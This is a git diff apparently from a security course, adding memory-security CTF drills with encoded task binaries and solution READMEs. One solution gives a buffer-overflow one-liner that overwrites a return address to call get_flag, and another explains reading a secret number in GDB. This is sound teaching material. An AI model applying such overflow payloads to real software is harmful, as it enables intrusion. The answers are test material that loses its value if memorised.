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

literal 0
HcmV?d00001

diff --git a/chapters/memory-security/ctf/drills/tasks/playing-god/README.md b/chapters/memory-security/ctf/drills/tasks/playing-god/README.md
new file mode 100644
index 00000000..05f03d13
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/playing-god/README.md
@@ -0,0 +1,6 @@
+# Playing God
+
+The `dynamic2` binary asks you to guess a number between 1 and 100000.
+Find a better way to discover it.
+
+To help you solve this exercise, like in the previous one, make sure to [keep an eye on the registers](https://stackoverflow.com/questions/5429137/how-to-print-register-values-in-gdb)!
diff --git a/chapters/memory-security/ctf/drills/tasks/playing-god/solution/README.md b/chapters/memory-security/ctf/drills/tasks/playing-god/solution/README.md
new file mode 100644
index 00000000..22de938b
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/playing-god/solution/README.md
@@ -0,0 +1,4 @@
+# Solution
+
+Run the executable with GDB.
+You can see the random number in the register before the input function call.
diff --git a/chapters/memory-security/ctf/drills/tasks/playing-god/support/dynamic2 b/chapters/memory-security/ctf/drills/tasks/playing-god/support/dynamic2
new file mode 100644
index 0000000000000000000000000000000000000000..01f5faa00fde5bff6e55b2a82b6039da682b506e
GIT binary patch
literal 9976
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
JTL_uW{ttE?vZ??8

literal 0
HcmV?d00001

diff --git a/chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/README.md b/chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/README.md
new file mode 100644
index 00000000..ca1aa17d
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/README.md
@@ -0,0 +1,6 @@
+# RIP my buffers off
+
+The `buff-ovf2` binary does not use the `get_flag()` function, but it offers an opportunity to call it.
+> **TIP:** Where can a function address be overwritten?
+
+[This example](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85), albeit also linked in the previous exercise, is still a great resource to help you solve this exercise.
diff --git a/chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/solution/README.md b/chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/solution/README.md
new file mode 100644
index 00000000..2c8d5927
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/solution/README.md
@@ -0,0 +1,6 @@
+# Solution
+
+The function address on the stack needs to be overwritten with the address of `get_flag`.
+Before reaching that, the payload needs to pass through some local variables and the EBP.
+
+`python3 -c 'import sys; sys.stdout.buffer.write(b"A"*41 + b"\x96\x85\x04\x08")' | ./buff-ovf2`
diff --git a/chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/support/buff-ovf2 b/chapters/memory-security/ctf/drills/tasks/rip-my-buffers-off/support/buff-ovf2
new file mode 100644
index 0000000000000000000000000000000000000000..4862cc7da49f5711a142d70b71cf2edaea6cf875
GIT binary patch
literal 10292
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
